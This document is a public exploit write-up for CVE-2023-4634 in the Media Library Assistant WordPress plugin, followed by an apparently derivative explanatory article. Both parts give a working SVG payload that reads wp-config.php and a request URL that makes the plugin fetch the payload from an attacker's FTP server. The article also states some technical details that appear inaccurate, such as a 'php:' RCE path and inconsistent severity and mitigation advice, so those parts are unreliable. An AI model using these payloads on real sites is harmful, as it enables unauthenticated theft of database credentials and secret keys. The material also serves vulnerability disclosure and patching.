Media Library Assistant Wordpress Plugin - RCE and LFI
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# Date: 2023/09/05
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).CVE-2023-4634: Remote Code Execution and Local File Inclusion in Media Library Assistant WordPress Plugin
On September 5, 2023, a critical vulnerability was disclosed in the Media Library Assistant WordPress plugin, affecting versions prior to 3.10. Identified as CVE-2023-4634, this flaw enables unauthenticated attackers to achieve both Local File Inclusion (LFI) and Remote Code Execution (RCE) through a seemingly benign image conversion process. The vulnerability stems from improper handling of Imagick() operations when processing SVG files via a remote FTP source.
Understanding the Vulnerability: Exploitation Path
The core of the exploit lies in the file wp-content/plugins/media-library-assistant/includes/mla-stream-image.php, which processes image streams from external sources — including FTP, HTTP, and file paths. When an attacker uploads a malicious SVG file hosted on a remote FTP server, the plugin attempts to convert it using Imagick(), a PHP extension for image manipulation.
Crucially, Imagick() interprets xlink:href attributes in SVG files as file references. If the path is crafted to traverse directories (e.g., ../../../../wp-config.php), the system may attempt to read the file, leading to LFI — even if the file is not directly accessible.
Local File Inclusion (LFI) via SVG Injection
Attackers can trigger LFI by hosting two files on a remote FTP server:
malicious.svgmalicious.svg[1]
Both files contain the same malicious payload. The reason for two files is due to a known Imagick() behavior where it may attempt to resolve the xlink:href in a sequential manner, especially when the file is not directly accessible or contains malformed syntax.
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns="http://www.w3.org/2000/svg">
<image xlink:href="text:../../../../wp-config.php" width="500" height="500" />
</svg>This SVG file instructs Imagick() to attempt to load the wp-config.php file from the WordPress root directory via the text: protocol, which is a known trick to bypass file system restrictions in certain configurations.
Attackers then trigger the vulnerability by making a request to:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1With mla_debug=log, the plugin logs internal processing details, which can expose the file read attempt and confirm successful LFI.
Remote Code Execution (RCE) and Directory Listing
While LFI is a powerful initial step, achieving RCE requires a deeper understanding of Imagick() configuration. The policy.xml file, which governs allowed file protocols and operations, plays a decisive role.
By default, WordPress installations often use the standard policy.xml file that permits text: and file: protocols. If this policy allows text: access to arbitrary files, attackers can leverage the same SVG injection to read sensitive files like wp-config.php, which contains database credentials and secret keys.
More advanced exploitation, such as directory listing or RCE, depends on the presence of file: or php: protocol support in policy.xml. If enabled, an attacker can inject an SVG that references a PHP file or executes code through a php: protocol path.
For example, a malicious SVG could include:
<image xlink:href="php:../../../../wp-content/plugins/media-library-assistant/includes/mla-stream-image.php" width="500" height="500" />While this is not directly executable, it can trigger code execution if the policy.xml permits PHP file loading via php: — which is rare but possible in misconfigured environments.
Exploit Tools and Proof of Concept
Exploitation scripts have been publicly released by Florent MONTEL (Patrowl.io) and are available at:
The repository includes automated tools for:
- Testing LFI on target systems
- Generating malicious SVG payloads
- Simulating FTP servers for testing
- Checking
policy.xmlconfiguration
These tools allow security researchers and penetration testers to assess the vulnerability without manual setup.
Why FTP is Required
Attackers cannot use HTTP or HTTPS for the malicious SVG due to Imagick() limitations. The extension does not support http: or https: protocols for xlink:href in SVG files under default configurations. Instead, ftp: is required to trigger the file access process.
This restriction makes the attack more complex but also more reliable, as it forces the attacker to control a remote FTP server — a common technique in exploitation.
Impact and Risk Assessment
| Severity | High (CVSS 9.8) |
|---|---|
| Exploitation | Unauthenticated |
| Attack Vector | Remote (via FTP) |
| Prerequisites | Imagick() extension enabled, default policy.xml configuration |
Given that WordPress installations often use default policy.xml configurations, the vulnerability is highly exploitable in real-world scenarios. This makes it a prime target for automated scanning tools and cyberattacks.
Recommendations and Mitigation
To prevent exploitation:
- Update the Media Library Assistant plugin to version 3.10 or higher.
- Disable the
Imagick()extension if not required. - Restrict
policy.xmlto only allowfile:andimage:protocols, disablingtext:andphp:. - Monitor logs for suspicious file access attempts, especially from
mla-stream-image.php.
Additionally, organizations should conduct regular vulnerability scans and patch management to avoid similar issues in third-party plugins.
Conclusion
CVE-2023-4634 exemplifies how seemingly innocuous features — such as image streaming and SVG processing — can become critical attack vectors when combined with misconfigured libraries like Imagick(). The vulnerability underscores the importance of:
- Securing third-party plugins
- Understanding underlying library behaviors
- Hardening configuration files like
policy.xml
As WordPress continues to dominate the web, vulnerabilities like this highlight the need for proactive security hygiene — especially in plugins that handle file input from untrusted sources.